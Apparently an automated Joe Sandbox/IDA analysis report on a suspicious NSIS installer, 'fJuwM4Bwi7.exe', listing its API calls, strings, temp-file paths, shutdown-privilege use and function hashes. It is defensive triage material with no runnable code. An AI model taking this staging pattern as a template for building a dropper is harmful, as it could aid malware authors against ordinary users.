404c06 5316->5359 5318 404a91 DeleteObject 5317->5318 5319 404a84 SendMessageA 5317->5319 5320 404a9a 5318->5320 5319->5318 5322 404ad1 5320->5322 5323 405d58 18 API calls 5320->5323 5321 404cea 5325 404d96 5321->5325 5330 404bf9 5321->5330 5335 404d43 SendMessageA 5321->5335 5324 403fec 19 API calls 5322->5324 5326 404ab3 SendMessageA SendMessageA 5323->5326 5329 404ae5 5324->5329 5327 404da0 SendMessageA 5325->5327 5328 404da8 5325->5328 5326->5320 5327->5328 5337 404dc1 5328->5337 5338 404dba ImageList_Destroy 5328->5338 5346 404dd1 5328->5346 5334 403fec 19 API calls 5329->5334 5331 404053 8 API calls 5330->5331 5336 404f8c 5331->5336 5332 404cdc SendMessageA 5332->5321 5333 
4048ea 5 API calls 5349 404c77 5333->5349 5350 404af3 5334->5350 5335->5330 5340 404d58 SendMessageA 5335->5340 5341 404dca GlobalFree 5337->5341 5337->5346 5338->5337 5339 404f40 5339->5330 5344 404f52 ShowWindow GetDlgItem ShowWindow 5339->5344 5343 404d6b 5340->5343 5341->5346 5342 404bc7 GetWindowLongA SetWindowLongA 5345 404be0 5342->5345 5351 404d7c SendMessageA 5343->5351 5344->5330 5347 404be6 ShowWindow 5345->5347 5348 404bfe 5345->5348 5346->5339 5358 40496a 4 API calls 5346->5358 5363 404e0c 5346->5363 5367 404021 SendMessageA 5347->5367 5368 404021 SendMessageA 5348->5368 5349->5321 5349->5332 5350->5342 5352 404bc1 5350->5352 5355 404b42 SendMessageA 5350->5355 5356 404b7e SendMessageA 5350->5356 5357 404b8f SendMessageA 5350->5357 5351->5325 5352->5342 5352->5345 5355->5350 5356->5350 5357->5350 5358->5363 5359->5321 5359->5333 5359->5349 5360 404f16 InvalidateRect 5360->5339 5361 404f2c 5360->5361 5369 4048a5 5361->5369 5362 404e3a SendMessageA 5366 404e50 5362->5366 5363->5362 5363->5366 5365 404ec4 SendMessageA SendMessageA 5365->5366 5366->5360 5366->5365 5367->5330 5368->5359 5372 4047e0 5369->5372 5371 4048ba 5371->5339 5373 4047f6 5372->5373 5374 405d58 18 API calls 5373->5374 5375 40485a 5374->5375 5376 405d58 18 API calls 5375->5376 5377 404865 5376->5377 5378 405d58 18 API calls 5377->5378 5379 40487b lstrlenA wsprintfA SetDlgItemTextA 5378->5379 5379->5371 5380 100010e0 5381 1000110e 5380->5381 5382 100011c4 GlobalFree 5381->5382 5383 100012ad 2 API calls 5381->5383 5384 100011c3 5381->5384 5385 10001266 2 API calls 5381->5385 5386 10001155 GlobalAlloc 5381->5386 5387 100011ea GlobalFree 5381->5387 5388 100011b1 GlobalFree 5381->5388 5389 100012d1 lstrcpyA 5381->5389 5383->5381 5384->5382 5385->5388 5386->5381 5387->5381 5388->5381 5389->5381 5390 4016a1 5391 4029fd 18 API calls 5390->5391 5392 4016a7 GetFullPathNameA 5391->5392 5393 4016be 5392->5393 5394 4016df 5392->5394 5393->5394 5397 40603a 2 API calls 5393->5397 5395 402892 
5394->5395 5396 4016f3 GetShortPathNameA 5394->5396 5396->5395 5398 4016cf 5397->5398 5398->5394 5400 405d36 lstrcpynA 5398->5400 5400->5394 5401 10002162 5402 100021c0 5401->5402 5404 100021f6 5401->5404 5403 100021d2 GlobalAlloc 5402->5403 5402->5404 5403->5402 5405 401d26 GetDC GetDeviceCaps 5406 4029e0 18 API calls 5405->5406 5407 401d44 MulDiv ReleaseDC 5406->5407 5408 4029e0 18 API calls 5407->5408 5409 401d63 5408->5409 5410 405d58 18 API calls 5409->5410 5411 401d9c CreateFontIndirectA 5410->5411 5412 4024cb 5411->5412 5413 40442a 5414 404456 5413->5414 5415 404467 5413->5415 5474 40552e GetDlgItemTextA 5414->5474 5417 404473 GetDlgItem 5415->5417 5418 4044d2 5415->5418 5421 404487 5417->5421 5419 4045b6 5418->5419 5428 405d58 18 API calls 5418->5428 5472 40475f 5418->5472 5419->5472 5476 40552e GetDlgItemTextA 5419->5476 5420 404461 5422 405fa1 5 API calls 5420->5422 5423 40449b SetWindowTextA 5421->5423 5426 40585f 4 API calls 5421->5426 5422->5415 5427 403fec 19 API calls 5423->5427 5425 404053 8 API calls 5430 404773 5425->5430 5431 404491 5426->5431 5432 4044b7 5427->5432 5433 404546 SHBrowseForFolderA 5428->5433 5429 4045e6 5434 4058b4 18 API calls 5429->5434 5431->5423 5438 4057c6 3 API calls 5431->5438 5435 403fec 19 API calls 5432->5435 5433->5419 5436 40455e CoTaskMemFree 5433->5436 5437 4045ec 5434->5437 5439 4044c5 5435->5439 5440 4057c6 3 API calls 5436->5440 5477 405d36 lstrcpynA 5437->5477 5438->5423 5475 404021 SendMessageA 5439->5475 5442 40456b 5440->5442 5445 4045a2 SetDlgItemTextA 5442->5445 5449 405d58 18 API calls 5442->5449 5444 4044cb 5447 406061 3 API calls 5444->5447 5445->5419 5446 404603 5448 406061 3 API calls 5446->5448 5447->5418 5455 40460b 5448->5455 5451 40458a lstrcmpiA 5449->5451 5450 404645 5478 405d36 lstrcpynA 5450->5478 5451->5445 5452 40459b lstrcatA 5451->5452 5452->5445 5454 40464e 5456 40585f 4 API calls 5454->5456 5455->5450 5460 40580d 2 API calls 5455->5460 5461 40469d 5455->5461 5457 404654 GetDiskFreeSpaceA 
5456->5457 5459 404676 MulDiv 5457->5459 5457->5461 5459->5461 5460->5455 5462 40470e 5461->5462 5464 4048a5 21 API calls 5461->5464 5463 404731 5462->5463 5465 40140b 2 API calls 5462->5465 5479 40400e KiUserCallbackDispatcher 5463->5479 5466 4046fb 5464->5466 5465->5463 5468 404710 SetDlgItemTextA 5466->5468 5469 404700 5466->5469 5468->5462 5470 4047e0 21 API calls 5469->5470 5470->5462 5471 40474d 5471->5472 5480 4043bf 5471->5480 5472->5425 5474->5420 5475->5444 5476->5429 5477->5446 5478->5454 5479->5471 5481 4043d2 SendMessageA 5480->5481 5482 4043cd 5480->5482 5481->5472 5482->5481 4167 40172c 4168 4029fd 18 API calls 4167->4168 4169 401733 4168->4169 4173 4059f6 4169->4173 4171 40173a 4172 4059f6 2 API calls 4171->4172 4172->4171 4174 405a01 GetTickCount GetTempFileNameA 4173->4174 4175 405a32 4174->4175 4176 405a2e 4174->4176 4175->4171 4176->4174 4176->4175 4177 401dac 4185 4029e0 4177->4185 4179 401db2 4180 4029e0 18 API calls 4179->4180 4181 401dbb 4180->4181 4182 401dc2 ShowWindow 4181->4182 4183 401dcd EnableWindow 4181->4183 4184 402892 4182->4184 4183->4184 4186 405d58 18 API calls 4185->4186 4187 4029f4 4186->4187 4187->4179 5483 401eac 5484 4029fd 18 API calls 5483->5484 5485 401eb3 5484->5485 5486 40603a 2 API calls 5485->5486 5487 401eb9 5486->5487 5489 401ecb 5487->5489 5490 405c94 wsprintfA 5487->5490 5490->5489 5491 40192d 5492 4029fd 18 API calls 5491->5492 5493 401934 lstrlenA 5492->5493 5494 4024cb 5493->5494 5495 4024af 5496 4029fd 18 API calls 5495->5496 5497 4024b6 5496->5497 5500 4059c7 GetFileAttributesA CreateFileA 5497->5500 5499 4024c2 5500->5499 5508 401cb0 5509 4029e0 18 API calls 5508->5509 5510 401cc0 SetWindowLongA 5509->5510 5511 402892 5510->5511 5512 401a31 5513 4029e0 18 API calls 5512->5513 5514 401a37 5513->5514 5515 4029e0 18 API calls 5514->5515 5516 4019e1 5515->5516 5517 401e32 5518 4029fd 18 API calls 5517->5518 5519 401e38 5518->5519 5520 40501f 25 API calls 5519->5520 5521 401e42 5520->5521 5522 4054e5 2 API 

                                        Control-flow Graph

                                        APIs
                                        • #17.COMCTL32 ref: 00403238
                                        • SetErrorMode.KERNELBASE(00008001), ref: 00403243
                                        • OleInitialize.OLE32(00000000), ref: 0040324A
                                          • Part of subcall function 00406061: GetModuleHandleA.KERNEL32(?,?,?,0040325C,00000009), ref: 00406073
                                          • Part of subcall function 00406061: LoadLibraryA.KERNELBASE(?,?,?,0040325C,00000009), ref: 0040607E
                                          • Part of subcall function 00406061: GetProcAddress.KERNEL32(00000000,?), ref: 0040608F
                                        • SHGetFileInfoA.SHELL32(0041ECB8,00000000,?,00000160,00000000,00000009), ref: 00403272
                                          • Part of subcall function 00405D36: lstrcpynA.KERNEL32(?,?,00000400,00403287,00422F00,NSIS Error), ref: 00405D43
                                        • GetCommandLineA.KERNEL32(00422F00,NSIS Error), ref: 00403287
                                        • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\fJuwM4Bwi7.exe",00000000), ref: 0040329A
                                        • CharNextA.USER32(00000000,"C:\Users\user\Desktop\fJuwM4Bwi7.exe",00000020), ref: 004032C5
                                        • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004033C2
                                        • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004033D3
                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033DF
                                        • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033F3
                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004033FB
                                        • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040340C
                                        • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403414
                                        • DeleteFileA.KERNELBASE(1033), ref: 00403428
                                        • OleUninitialize.OLE32(?), ref: 004034D6
                                        • ExitProcess.KERNEL32 ref: 004034F6
                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\fJuwM4Bwi7.exe",00000000,?), ref: 00403502
                                        • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop), ref: 0040350E
                                        • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040351A
                                        • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403521
                                        • DeleteFileA.KERNEL32(0041E8B8,0041E8B8,?,00424000,?), ref: 0040357A
                                        • CopyFileA.KERNEL32(C:\Users\user\Desktop\fJuwM4Bwi7.exe,0041E8B8,00000001), ref: 0040358E
                                        • CloseHandle.KERNEL32(00000000,0041E8B8,0041E8B8,?,0041E8B8,00000000), ref: 004035BB
                                        • GetCurrentProcess.KERNEL32(00000028,?,00000006,00000005,00000004), ref: 00403614
                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 0040366C
                                        • ExitProcess.KERNEL32 ref: 0040368F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                        • String ID: "$"C:\Users\user\Desktop\fJuwM4Bwi7.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\terephthalate\edderdun$C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Classifies$C:\Users\user\Desktop$C:\Users\user\Desktop\fJuwM4Bwi7.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$`KGw$~nsu.tmp
                                        • API String ID: 4107622049-3805561568
                                        • Opcode ID: 0e0f6a3637583670758f503623c3da15b8d87b56266dba0afd803753b1801d7b
                                        • Instruction ID: 3d26bb40307c87b2cd60c260c775e6d0301d96a10e68b952128d49a18977981a
                                        • Opcode Fuzzy Hash: 0e0f6a3637583670758f503623c3da15b8d87b56266dba0afd803753b1801d7b
                                        • Instruction Fuzzy Hash: 85B107706082517AE721AF659D8DA2B3EACEB41706F04447FF541BA1E2C77C9E01CB6E

                                        Control-flow Graph

                                        APIs
                                        • GetDlgItem.USER32(?,00000403), ref: 004051BC
                                        • GetDlgItem.USER32(?,000003EE), ref: 004051CB
                                        • GetClientRect.USER32(?,?), ref: 00405208
                                        • GetSystemMetrics.USER32(00000002), ref: 0040520F
                                        • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405230
                                        • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405241
                                        • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405254
                                        • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405262
                                        • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405275
                                        • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405297
                                        • ShowWindow.USER32(?,00000008), ref: 004052AB
                                        • GetDlgItem.USER32(?,000003EC), ref: 004052CC
                                        • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004052DC
                                        • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004052F5
                                        • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405301
                                        • GetDlgItem.USER32(?,000003F8), ref: 004051DA
                                          • Part of subcall function 00404021: SendMessageA.USER32(00000028,?,00000001,00403E52), ref: 0040402F
                                        • GetDlgItem.USER32(?,000003EC), ref: 0040531D
                                        • CreateThread.KERNEL32(00000000,00000000,Function_000050F1,00000000), ref: 0040532B
                                        • CloseHandle.KERNELBASE(00000000), ref: 00405332
                                        • ShowWindow.USER32(00000000), ref: 00405355
                                        • ShowWindow.USER32(?,00000008), ref: 0040535C
                                        • ShowWindow.USER32(00000008), ref: 004053A2
                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004053D6
                                        • CreatePopupMenu.USER32 ref: 004053E7
                                        • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004053FC
                                        • GetWindowRect.USER32(?,000000FF), ref: 0040541C
                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405435
                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405471
                                        • OpenClipboard.USER32(00000000), ref: 00405481
                                        • EmptyClipboard.USER32 ref: 00405487
                                        • GlobalAlloc.KERNEL32(00000042,?), ref: 00405490
                                        • GlobalLock.KERNEL32(00000000), ref: 0040549A
                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004054AE
                                        • GlobalUnlock.KERNEL32(00000000), ref: 004054C7
                                        • SetClipboardData.USER32(00000001,00000000), ref: 004054D2
                                        • CloseClipboard.USER32 ref: 004054D8
                                        Strings
                                        • Angribeligere Setup: Installing, xrefs: 0040544D
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                        • String ID: Angribeligere Setup: Installing
                                        • API String ID: 590372296-2219571644
                                        • Opcode ID: 3e6425cd8027a1822d7c02b399c2ff8f99ecd6318ec4cf5a11e34b93871bf819
                                        • Instruction ID: 24acf85f457993e5d1a00f4a74fbc0a00d7f38a893508f9c9f1f5035b4e63235
                                        • Opcode Fuzzy Hash: 3e6425cd8027a1822d7c02b399c2ff8f99ecd6318ec4cf5a11e34b93871bf819
                                        • Instruction Fuzzy Hash: 5FA15BB1900208BFDB219FA0DD89AAE7F79FB08355F10407AFA04B61A0C7B55E51DF69

                                        Control-flow Graph

                                        APIs
                                        • GetVersion.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll,00000000,00405057,Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll,00000000), ref: 00405E09
                                        • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00405E84
                                        • GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405E97
                                        • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405ED3
                                        • SHGetPathFromIDListA.SHELL32(00000000,Call), ref: 00405EE1
                                        • CoTaskMemFree.OLE32(00000000), ref: 00405EEC
                                        • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405F0E
                                        • lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll,00000000,00405057,Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll,00000000), ref: 00405F60
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                        • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$wi
                                        • API String ID: 900638850-831090937
                                        • Opcode ID: 4acb4603a534f03f61e1b5029561f8864cf9bf083dd2ad4547ff7456c33bf565
                                        • Instruction ID: 9c0e267699f90c8e910d98bdf84d4b8f2614ab6024826f89c9d009b20b1e8bc4
                                        • Opcode Fuzzy Hash: 4acb4603a534f03f61e1b5029561f8864cf9bf083dd2ad4547ff7456c33bf565
                                        • Instruction Fuzzy Hash: 10610571A04905ABDF215F64DC84B7B3BA8DB55304F10813BE641B62D1D33C4A42DF9E

                                        Control-flow Graph

                                        APIs
                                        • DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,77462EE0,00000000), ref: 0040561F
                                        • lstrcatA.KERNEL32(00420D00,\*.*,00420D00,?,?,C:\Users\user\AppData\Local\Temp\,77462EE0,00000000), ref: 00405667
                                        • lstrcatA.KERNEL32(?,00409014,?,00420D00,?,?,C:\Users\user\AppData\Local\Temp\,77462EE0,00000000), ref: 00405688
                                        • lstrlenA.KERNEL32(?,?,00409014,?,00420D00,?,?,C:\Users\user\AppData\Local\Temp\,77462EE0,00000000), ref: 0040568E
                                        • FindFirstFileA.KERNELBASE(00420D00,?,?,?,00409014,?,00420D00,?,?,C:\Users\user\AppData\Local\Temp\,77462EE0,00000000), ref: 0040569F
                                        • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 0040574C
                                        • FindClose.KERNEL32(00000000), ref: 0040575D
                                        Strings
                                        • "C:\Users\user\Desktop\fJuwM4Bwi7.exe", xrefs: 004055F6
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405604
                                        • \*.*, xrefs: 00405661
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                        • String ID: "C:\Users\user\Desktop\fJuwM4Bwi7.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                        • API String ID: 2035342205-3313926952
                                        • Opcode ID: 25106c92b3c871bc14427ef9fb8c6b07d152e7746fae866eacc9b6d331f36872
                                        • Instruction ID: a1a18f6d4a87cf364f513f4d5348cf8987bf6841df45d5f239a42b9e89fe31fb
                                        • Opcode Fuzzy Hash: 25106c92b3c871bc14427ef9fb8c6b07d152e7746fae866eacc9b6d331f36872
                                        • Instruction Fuzzy Hash: 8051D230905A04FADB216B618C89BBF7AB8DF42714F54803BF445721D2D73C4942EE6E
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 743aa33a108d29f9cab5e819e308a9554fb8e98817c33194d1e30fb36f92eda3
                                        • Instruction ID: 49e2905b870d629617cd54a3ad4ea64d750052a334705c7e6b68d35cedeefd19
                                        • Opcode Fuzzy Hash: 743aa33a108d29f9cab5e819e308a9554fb8e98817c33194d1e30fb36f92eda3
                                        • Instruction Fuzzy Hash: 28F17970D00229CBCF28CFA8C8946ADBBB1FF45305F25856ED856BB281D3785A96CF45
                                        APIs
                                        • CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040208B
                                        • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00407374,?,?), ref: 00402143
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Classifies, xrefs: 004020CB
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: ByteCharCreateInstanceMultiWide
                                        • String ID: C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Classifies
                                        • API String ID: 123533781-1144022150
                                        • Opcode ID: 844d7db231ce930ba87aa91d55221135eb66824421c535283c4cff4e72d9e9e5
                                        • Instruction ID: 1053df79af30500630abfeafbcf843dcec04d0d4e3091bc204b5fde3a4f6985c
                                        • Opcode Fuzzy Hash: 844d7db231ce930ba87aa91d55221135eb66824421c535283c4cff4e72d9e9e5
                                        • Instruction Fuzzy Hash: 3B416D71A00209BFCB40EFA4CE88E9E7BB5BF48354B2042A9F911FB2D1D6799D41DB54
                                        APIs
                                        • FindFirstFileA.KERNELBASE(?,00421548,Invaliditetsprocent209\indoktrineringen.rec,004058F7,Invaliditetsprocent209\indoktrineringen.rec,Invaliditetsprocent209\indoktrineringen.rec,00000000,Invaliditetsprocent209\indoktrineringen.rec,Invaliditetsprocent209\indoktrineringen.rec,?,?,77462EE0,00405616,?,C:\Users\user\AppData\Local\Temp\,77462EE0), ref: 00406045
                                        • FindClose.KERNEL32(00000000), ref: 00406051
                                        Strings
                                        • Invaliditetsprocent209\indoktrineringen.rec, xrefs: 0040603A
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: Find$CloseFileFirst
                                        • String ID: Invaliditetsprocent209\indoktrineringen.rec
                                        • API String ID: 2295610775-2173611331
                                        • Opcode ID: 1aa7e4dc1003f693668b82639e535814eeaefdc3a4332bebb0b1aa5890d42f5a
                                        • Instruction ID: ffb9975cce6792308ede9dbdbab0a2e32819aea082b360212a672f9e7c6ece7a
                                        • Opcode Fuzzy Hash: 1aa7e4dc1003f693668b82639e535814eeaefdc3a4332bebb0b1aa5890d42f5a
                                        • Instruction Fuzzy Hash: 7BD012319490306BC3106B787C0C85B7A599F573317118A33B56AF12F0C7389C7286ED
                                        APIs
                                        • GetModuleHandleA.KERNEL32(?,?,?,0040325C,00000009), ref: 00406073
                                        • LoadLibraryA.KERNELBASE(?,?,?,0040325C,00000009), ref: 0040607E
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0040608F
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: AddressHandleLibraryLoadModuleProc
                                        • String ID:
                                        • API String ID: 310444273-0
                                        • Opcode ID: 14778026069da28af87b9950d589da7dca929d2a00fc8d83b3a738ce3464f0c4
                                        • Instruction ID: 2c1b19e4de550b622e70843c6ca25527790cfa0381149662c4593fbace01eca7
                                        • Opcode Fuzzy Hash: 14778026069da28af87b9950d589da7dca929d2a00fc8d83b3a738ce3464f0c4
                                        • Instruction Fuzzy Hash: 00E0C232A04211ABC321AB749D48D3B73ACAFD8751309493EF50AF6150D734AC21EBBA

                                        Control-flow Graph

                                        APIs
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B55
                                        • ShowWindow.USER32(?), ref: 00403B72
                                        • DestroyWindow.USER32 ref: 00403B86
                                        • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403BA2
                                        • GetDlgItem.USER32(?,?), ref: 00403BC3
                                        • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403BD7
                                        • IsWindowEnabled.USER32(00000000), ref: 00403BDE
                                        • GetDlgItem.USER32(?,00000001), ref: 00403C8C
                                        • GetDlgItem.USER32(?,00000002), ref: 00403C96
                                        • SetClassLongA.USER32(?,000000F2,?), ref: 00403CB0
                                        • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403D01
                                        • GetDlgItem.USER32(?,00000003), ref: 00403DA7
                                        • ShowWindow.USER32(00000000,?), ref: 00403DC8
